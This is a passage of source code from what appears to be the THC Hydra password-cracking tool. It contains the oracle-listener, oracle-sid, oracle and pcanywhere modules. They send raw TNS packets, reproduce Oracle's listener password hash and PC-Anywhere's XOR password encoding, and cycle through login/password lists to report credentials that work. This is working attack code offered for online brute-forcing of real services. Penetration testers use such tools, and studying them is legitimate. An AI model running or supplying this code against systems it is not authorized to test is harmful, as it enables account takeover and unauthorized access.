DIGEST-MD5, NTLM\\n\\n\");\n}\n" }, { "path": "hydra-oracle-listener.c", "content": "/*\ndavid:\n\nPASSWORDS_LISTENER in listener.ora can be in clear or in plain mode,\nthis module support the 2 modes, use -m PLAIN or -m CLEAR on the cmd\nline. Default is plain (oracle 10 uses it).\n\nThanks to Marcell for the plain mode analysis available\nat http://marcellmajor.com/frame_listenerhash.html\n\n*/\n\n#include \"hydra-mod.h\"\n#ifndef LIBOPENSSL\n#include \nvoid dummy_oracle_listener() { printf(\"\\n\"); }\n#else\n#include \"sasl.h\"\n#include \n#define HASHSIZE 17\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nchar *buf;\nunsigned char *hash;\nint32_t sid_mechanism = AUTH_PLAIN;\n\nint32_t initial_permutation(unsigned char **result, char *p_str, int32_t *sz) {\n int32_t k = 0;\n int32_t i = strlen(p_str);\n char *buff;\n\n // expand the string with zero so that length is a multiple of 4\n while ((i % 4) != 0) {\n i = i + 1;\n }\n *sz = 2 * i;\n\n if ((buff = malloc(i + 4)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n memset(buff, 0, i + 4);\n strcpy(buff, p_str);\n\n // swap the order of every byte pair\n for (k = 0; k < i; k += 2) {\n char bck = buff[k + 1];\n\n buff[k + 1] = buff[k];\n buff[k] = bck;\n }\n // convert to unicode\n if ((*result = malloc(2 * i)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n free(buff);\n return 1;\n }\n memset(*result, 0, 2 * i);\n for (k = 0; k < i; k++) {\n (*result)[2 * k] = buff[k];\n }\n free(buff);\n\n return 0;\n}\n\nint32_t ora_hash(unsigned char **orahash, unsigned char *buf, int32_t len) {\n int32_t i;\n\n if ((*orahash = malloc(HASHSIZE)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n\n for (i = 0; i < 8; i++) {\n sprintf(((char *)*orahash) + i * 2, \"%02X\", buf[len - 8 + i]);\n }\n return 0;\n}\n\nint32_t convert_byteorder(unsigned char **result, int32_t size) {\n int32_t i = 0;\n char *buff;\n\n if ((buff = malloc(size)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n memcpy(buff, *result, size);\n\n while (i < size) {\n buff[i + 0] = (*result)[i + 3];\n buff[i + 1] = (*result)[i + 2];\n buff[i + 2] = (*result)[i + 1];\n buff[i + 3] = (*result)[i + 0];\n i += 4;\n }\n memcpy(*result, buff, size);\n free(buff);\n return 0;\n}\n\nint32_t ora_descrypt(unsigned char **rs, unsigned char *result, int32_t siz) {\n int32_t i = 0;\n char lastkey[8];\n DES_key_schedule ks1;\n unsigned char key1[8] = {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF};\n unsigned char ivec1[] = {0, 0, 0, 0, 0, 0, 0, 0};\n unsigned char *desresult;\n\n memset(ivec1, 0, sizeof(ivec1));\n if ((desresult = malloc(siz)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n DES_key_sched((const_DES_cblock *)key1, &ks1);\n DES_ncbc_encrypt(result, desresult, siz, &ks1, &ivec1, DES_ENCRYPT);\n\n for (i = 0; i < 8; i++) {\n lastkey[i] = desresult[siz - 8 + i];\n }\n\n DES_key_sched((const_DES_cblock *)lastkey, &ks1);\n memset(desresult, 0, siz);\n memset(ivec1, 0, sizeof(ivec1));\n DES_ncbc_encrypt(result, desresult, siz, &ks1, &ivec1, DES_ENCRYPT);\n\n if ((*rs = malloc(siz)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n free(desresult);\n return 1;\n }\n memcpy(*rs, desresult, siz);\n\n return 0;\n}\n\nint32_t ora_hash_password(char *pass) {\n // secret hash function comes here, and written to char *hash\n int32_t siz = 0;\n unsigned char *desresult;\n unsigned char *result;\n char buff[strlen(pass) + 5];\n\n memset(buff, 0, sizeof(buff));\n\n // concatenate Arb string and convert the resulting string to uppercase\n snprintf(buff, sizeof(buff), \"Arb%s\", pass);\n strupper(buff);\n\n if (initial_permutation(&result, buff, &siz)) {\n hydra_report(stderr, \"[ERROR] ora_hash_password: in initial_permutation\\n\");\n return 1;\n }\n\n if (convert_byteorder(&result, siz)) {\n hydra_report(stderr, \"[ERROR] ora_hash_password: in convert_byteorder\\n\");\n free(result);\n return 1;\n }\n if (ora_descrypt(&desresult, result, siz)) {\n hydra_report(stderr, \"[ERROR] ora_hash_password: in DES crypt\\n\");\n free(result);\n return 1;\n }\n free(result);\n if (ora_hash(&result, desresult, siz)) {\n hydra_report(stderr, \"[ERROR] ora_hash_password: in extracting Oracle hash\\n\");\n free(desresult);\n return 1;\n }\n\n memcpy(hash, result, HASHSIZE);\n free(desresult);\n free(result);\n\n return 0;\n}\n\nint32_t start_oracle_listener(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n unsigned char tns_packet_begin[22] = {\"\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x36\\x01\\x2c\\x00\\x00\\x08\\x00\\x7f\\xff\\x86\\x0e\"\n \"\\x00\\x00\\x01\\x00\"};\n unsigned char tns_packet_end[32] = {\"\\x00\\x3a\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x09\\x94\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"};\n\n char *empty = \"\";\n char *pass;\n char connect_string[200];\n char buffer2[260];\n int32_t siz = 0;\n\n memset(connect_string, 0, sizeof(connect_string));\n memset(buffer2, 0, sizeof(buffer2));\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (sid_mechanism == AUTH_PLAIN) {\n if ((hash = malloc(HASHSIZE)) == NULL) {\n hydra_report(stderr, \"[ERROR] Can't allocate memory\\n\");\n return 1;\n }\n memset(hash, 0, HASHSIZE);\n if (ora_hash_password(pass)) {\n hydra_report(stderr, \"[ERROR] generating Oracle hash\\n\");\n free(hash);\n return 1;\n }\n pass = (char *)hash;\n }\n snprintf(connect_string, sizeof(connect_string),\n \"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(\"\n \"PASSWORD=%s)(SERVICE=)(VERSION=169869568)))\",\n pass);\n\n if (hash != NULL)\n free(hash);\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] using connectiong string: %s\\n\", connect_string);\n\n siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);\n if (siz > 255) {\n buffer2[0] = 1;\n buffer2[1] = siz - 256;\n } else {\n buffer2[1] = siz;\n }\n memcpy(buffer2 + 2, (char *)tns_packet_begin, sizeof(tns_packet_begin));\n siz = strlen(connect_string);\n if (siz > 255) {\n buffer2[2 + sizeof(tns_packet_begin)] = 1;\n buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;\n } else {\n buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;\n }\n memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *)tns_packet_end, sizeof(tns_packet_end));\n memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));\n if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {\n return 1;\n }\n\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (verbose || debug)\n hydra_report(stderr, \"[VERBOSE] Server answer: %s\\n\", buf);\n\n if (strstr(buf, \"ERR=0\") != NULL) {\n hydra_report_found_host(port, ip, \"oracle-listener\", fp);\n hydra_completed_pair_found();\n } else\n hydra_completed_pair();\n\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_oracle_listener(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n strupper(miscptr);\n if (strncmp(miscptr, \"CLEAR\", 5) == 0)\n sid_mechanism = AUTH_CLEAR;\n }\n if (verbose) {\n switch (sid_mechanism) {\n case AUTH_CLEAR:\n hydra_report(stderr, \"[VERBOSE] using SID CLEAR mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using SID PLAIN mechanism\\n\");\n break;\n }\n }\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n /* run the cracking function */\n next_run = start_oracle_listener(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_oracle_listener_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_oracle_listener(const char *service) {\n printf(\"Module oracle-listener / tns is optionally taking the mode the \"\n \"password is stored as, could be PLAIN (default) or CLEAR\\n\\n\");\n}\n\n#endif\n" }, { "path": "hydra-oracle-sid.c", "content": "\n/*\ndavid:\n\nmodule used to check for a valid oracle SID\nORCL and XE are a good start, but you should\nfind a big list on the Internet\n\n*/\n\n#include \"hydra-mod.h\"\n#ifndef LIBOPENSSL\n#include \nvoid dummy_oracle_sid() { printf(\"\\n\"); }\n#else\n#include \n#define HASHSIZE 16\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\nchar *buf;\nunsigned char *hash;\n\nint32_t start_oracle_sid(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n /*\n PP is the packet length\n XX is the length of connect data\n PP + tns_packet_begin + XX + tns_packet_end\n */\n unsigned char tns_packet_begin[22] = {\"\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x36\\x01\\x2c\\x00\\x00\\x08\\x00\\x7f\\xff\\x86\\x0e\"\n \"\\x00\\x00\\x01\\x00\"};\n unsigned char tns_packet_end[32] = {\"\\x00\\x3a\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x09\\x94\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"};\n char *empty = \"\";\n char *login;\n char connect_string[200];\n char buffer2[260];\n int32_t siz = 0;\n\n memset(connect_string, 0, sizeof(connect_string));\n memset(buffer2, 0, sizeof(buffer2));\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n\n snprintf(connect_string, sizeof(connect_string),\n \"(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(\"\n \"USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))\",\n login, hydra_address2string(ip), port);\n siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);\n if (siz > 255) {\n buffer2[0] = 1;\n buffer2[1] = siz - 256;\n } else {\n buffer2[1] = siz;\n }\n memcpy(buffer2 + 2, (char *)tns_packet_begin, sizeof(tns_packet_begin));\n siz = strlen(connect_string);\n if (siz > 255) {\n buffer2[2 + sizeof(tns_packet_begin)] = 1;\n buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;\n } else {\n buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;\n }\n memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *)tns_packet_end, sizeof(tns_packet_end));\n memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));\n if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {\n return 1;\n }\n\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n // if no error reported. it should be a resend packet type 00 08 00 00 0b 00\n // 00 00, 4 is refuse\n if ((strstr(buf, \"ERR=\") == NULL) && (buf[4] != 4)) {\n hydra_report_found_host(port, ip, \"oracle-sid\", fp);\n hydra_completed_pair_found();\n } else\n hydra_completed_pair();\n\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_oracle_sid(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n /* run the cracking function */\n next_run = start_oracle_sid(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4:\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(2);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_oracle_sid_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\n#endif\n" }, { "path": "hydra-oracle.c", "content": "/*\n\ndavid: code is based on SNORT spo_database.c\n\ntested with :\n-instantclient_10_2 on Oracle 10.2.0\n-instantclient-basic-linux.*-11.2.0.3.0.zip +\ninstantclient-sdk-linux.*-11.2.0.3.0.zip on Oracle 9i and on Oracle 11g\n\n*/\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBORACLE\n\nvoid dummy_oracle() { printf(\"\\n\"); }\n\n#else\n\n#include \n#include \n#include \n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n\nOCIEnv *o_environment;\nOCISvcCtx *o_servicecontext;\nOCIBind *o_bind;\nOCIError *o_error;\nOCIStmt *o_statement;\nOCIDefine *o_define;\ntext o_errormsg[512];\nsb4 o_errorcode;\n\nvoid print_oracle_error(char *err) {\n if (verbose) {\n OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);\n fprintf(stderr, \"[ERROR] Oracle_error: %s - %s\\n\", o_errormsg, err);\n }\n}\n\nint32_t start_oracle(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, buffer[200], sid[100];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n strncpy(sid, miscptr, sizeof(sid) - 1);\n sid[sizeof(sid) - 1] = 0;\n snprintf(buffer, sizeof(buffer), \"//%s:%d/%s\", hydra_address2string(ip), port, sid);\n\n /*\n\n To use the Easy Connect naming method, PHP must be linked with Oracle 10g\n or greater Client libraries. The Easy Connect string for Oracle 10g is of\n the form: [//]host_name[:port][/service_name]. With Oracle 11g, the syntax\n is: [//]host_name[:port][/service_name][:server_type][/instance_name].\n Service names can be found by running the Oracle utility lsnrctl status on\n the database server machine.\n\n The tnsnames.ora file can be in the Oracle Net search path, which includes\n $ORACLE_HOME/network/admin and /etc. Alternatively set TNS_ADMIN so that\n $TNS_ADMIN/tnsnames.ora is read. Make sure the web daemon has read access\n to the file.\n\n */\n\n if (OCIInitialize(OCI_DEFAULT, NULL, NULL, NULL, NULL)) {\n print_oracle_error(\"OCIInitialize\");\n return 4;\n }\n if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {\n print_oracle_error(\"OCIEnvInit\");\n return 4;\n }\n if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {\n print_oracle_error(\"OCIEnvInit 2\");\n return 4;\n }\n if (OCIHandleAlloc(o_environment, (dvoid **)&o_error, OCI_HTYPE_ERROR, (size_t)0, NULL)) {\n print_oracle_error(\"OCIHandleAlloc\");\n return 4;\n }\n\n bool success = true;\n if (OCILogon(o_environment, o_error, &o_servicecontext, (const OraText *)login, strlen(login), (const OraText *)pass, strlen(pass), (const OraText *)buffer, strlen(buffer))) {\n success = false;\n OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);\n // database: oracle_error: ORA-01017: invalid username/password; logon\n // denied database: oracle_error: ORA-12514: TNS:listener does not currently\n // know of service requested in connect descriptor database: oracle_error:\n // ORA-28000: the account is locked Failed login attempts is set to 10 by\n // default\n if (verbose) {\n hydra_report(stderr, \"[VERBOSE] database: oracle_error: %s\\n\", o_errormsg);\n }\n if (strstr((const char *)o_errormsg, \"ORA-12514\") != NULL) {\n hydra_report(stderr, \"[ERROR] ORACLE SID is not valid, you should try to \"\n \"enumerate them.\\n\");\n hydra_completed_pair();\n return 3;\n }\n if (strstr((const char *)o_errormsg, \"ORA-28000\") != NULL) {\n hydra_report(stderr, \"[INFO] ORACLE account %s is locked.\\n\", login);\n hydra_completed_pair_skip();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n // ORA-28002: the password will expire within 7 days\n if (strstr((const char *)o_errormsg, \"ORA-28002\") != NULL) {\n hydra_report(stderr, \"[INFO] ORACLE account %s password will expire soon.\\n\", login);\n success = true;\n }\n }\n\n if (success) {\n OCILogoff(o_servicecontext, o_error);\n hydra_report_found_host(port, ip, \"oracle\", fp);\n hydra_completed_pair_found();\n } else {\n hydra_completed_pair();\n }\n if (o_error) {\n OCIHandleFree((dvoid *)o_error, OCI_HTYPE_ERROR);\n }\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return success ? 1 : 2;\n}\n\nvoid service_oracle(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ORACLE;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n if ((miscptr == NULL) || (strlen(miscptr) == 0)) {\n // SID is required as miscptr\n hydra_report(stderr, \"[ERROR] Oracle SID is required, using ORCL as default\\n\");\n miscptr = \"ORCL\";\n }\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n next_run = 2;\n break;\n case 2:\n next_run = start_oracle(sock, ip, port, options, miscptr, fp);\n if ((next_run == 1 || next_run == 2) && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n\n // by default, set in sqlnet.ora, the trace file is generated in pwd to log\n // any errors happening, as we don't care, we are deleting the file set\n // these parameters to not generate the file LOG_DIRECTORY_CLIENT =\n // /dev/null LOG_FILE_CLIENT = /dev/null\n unlink(\"sqlnet.log\");\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_oracle_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_oracle(const char *service) {\n printf(\"Module oracle / ora is optionally taking the ORACLE SID, default is \"\n \"\\\"ORCL\\\"\\n\\n\");\n}\n" }, { "path": "hydra-pcanywhere.c", "content": "// This plugin was written by \n//\n// PC-Anywhere authentication protocol test on Symantec PC-Anywhere 10.5\n//\n// no memleaks found on 110425\n\n#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\n\nint32_t pcadebug = 0;\n\nint32_t send_cstring(int32_t s, char *crypted_string) {\n char buffer2[100], *bptr = buffer2;\n char clientcryptheader[] = \"\\x06\";\n\n memset(buffer2, 0, sizeof(clientcryptheader));\n bptr = buffer2;\n buffer2[0] = 6;\n bptr++;\n buffer2[1] = strlen(crypted_string);\n bptr++;\n strcpy(bptr, crypted_string);\n\n return hydra_send(s, buffer2, 2 + strlen(crypted_string), 0);\n}\n\nvoid show_buffer(char *buffer, int32_t size) {\n int32_t i;\n\n printf(\"size: %d, buffer:\\n\", size);\n for (i = 0; i < size; i++) {\n printf(\"%c\", buffer[i]);\n }\n printf(\"\\n\");\n}\n\nvoid clean_buffer(char *buf, int32_t size) {\n int32_t i;\n\n for (i = 0; i < size; i++) {\n int32_t pos = buf[i];\n\n if (pos < 32 || pos > 126) {\n // . char\n buf[i] = 46;\n }\n }\n}\n\nvoid print_encrypted_str(char *str) {\n int32_t i;\n\n printf(\"encode string: \");\n for (i = 0; i < strlen(str); i++) {\n printf(\"%x \", str[i]);\n }\n printf(\"\\n\");\n}\n\nvoid pca_encrypt(char *cleartxt) {\n char passwd[128];\n int32_t i;\n\n strncpy(passwd, cleartxt, sizeof(passwd) - 1);\n passwd[sizeof(passwd) - 1] = 0;\n if (strlen(cleartxt) > 0) {\n passwd[0] = (passwd[0] ^ 0xab);\n for (i = 1; i < strlen(passwd); i++)\n passwd[i] = passwd[i - 1] ^ passwd[i] ^ (i - 1);\n passwd[strlen(passwd)] = '\\0';\n strcpy(cleartxt, passwd);\n }\n}\n\nvoid pca_decrypt(char *password) {\n char cleartext[128];\n int32_t i;\n\n if (strlen(password) > 0) {\n cleartext[0] = password[0] ^ 0xab;\n for (i = 1; i < strlen(password); i++)\n cleartext[i] = password[i - 1] ^ password[i] ^ (i - 1);\n cleartext[strlen(password)] = '\\0';\n strcpy(password, cleartext);\n }\n}\n\nvoid debugprintf(char *msg) {\n if (pcadebug)\n printf(\"debug: %s\\n\", msg);\n}\n\nint32_t start_pcanywhere(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n char buffer[2048] = \"\";\n char clogin[128] = \"\";\n char cpass[128] = \"\";\n int32_t ret, i;\n\n char *client[4];\n char *server[5];\n int32_t clientsize[4];\n\n client[0] = \"\\x00\\x00\\x00\\x00\";\n clientsize[0] = 4;\n client[1] = \"\\x6F\\x06\\xff\";\n clientsize[1] = 3;\n client[2] = \"\\x6f\\x61\\x00\\x09\\x00\\xfe\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x00\";\n clientsize[2] = 14;\n client[3] = \"\\x6f\\x62\\x01\\x02\\x00\\x00\\x00\";\n clientsize[3] = 7;\n\n server[0] = \"nter\";\n server[1] = \"\\x1B\\x61\";\n server[2] = \"\\0x1B\\0x62\";\n server[3] = \"Enter login name\";\n server[4] = \"denying connection\";\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n debugprintf(\"dans pcanywhere start\");\n\n /*printf(\"testing %s:%s\\n\",login,pass); */\n\n strcpy(clogin, login);\n strcpy(cpass, pass);\n\n pca_encrypt(clogin);\n pca_encrypt(cpass);\n\n for (i = 0; i < 4; i++) {\n if (hydra_send(s, client[i], clientsize[i], 0) < 0) {\n return 1;\n }\n\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n if (ret == -1) {\n return 1;\n }\n\n if (i == 3) {\n if (ret == 3) {\n /*one more to get the login prompt */\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n }\n }\n\n if (ret >= 0)\n buffer[ret] = 0;\n\n if (i == 0 || i == 3)\n clean_buffer(buffer, ret);\n\n if (debug)\n show_buffer(buffer, ret);\n\n if (i == 2) {\n clean_buffer(buffer, ret);\n buffer[sizeof(buffer) - 1] = 0;\n if (strstr(buffer, server[i + 2]) != NULL) {\n fprintf(stderr, \"[ERROR] PC Anywhere host denying connection because \"\n \"you have requested a lower encrypt level\\n\");\n return 3;\n }\n }\n\n if (strstr(buffer, server[i]) == NULL) {\n if (i == 3) {\n debugprintf(\"problem receiving login banner\");\n }\n return 1;\n }\n }\n\n if (send_cstring(s, clogin) < 0) {\n return 1;\n }\n ret = hydra_recv(s, buffer, sizeof(buffer) - 1);\n if (ret < 0) {\n return 1;\n }\n buffer[ret] = 0;\n clean_buffer(buffer, ret);\n /*show_buffer(buffer,ret); */\n if (strstr(buffer, \"Enter password:\") == NULL) {\n debugprintf(\"problem receiving password banner\");\n return 1;\n }\n\n if (send_cstring(s, cpass) < 0) {\n return 1;\n }\n\n ret = hydra_recv(s, buffer, sizeof(buffer));\n if (ret < 0)\n return 1;\n else\n buffer[ret] = 0;\n\n clean_buffer(buffer, ret);\n /*show_buffer(buffer,ret); */\n\n if ((strstr(buffer, \"Invalid login\") != NULL) || (strstr(buffer, \"Enter password\") != NULL)) {\n debugprintf(\"login/passwd wrong\");\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n } else {\n debugprintf(\"cool find login/passwd\");\n\n hydra_report_found_host(port, ip, \"pcanywhere\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n return 1;\n}\n\nvoid service_pcanywhere(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_PCANYWHERE, mysslport = PORT_PCANYWHERE_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n\n case 2:\n\n next_run = start_pcanywhere(sock, ip, port, options, miscptr, fp);\n break;\n case 3:\n\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n\n default:\n\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_pcanywhere_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message 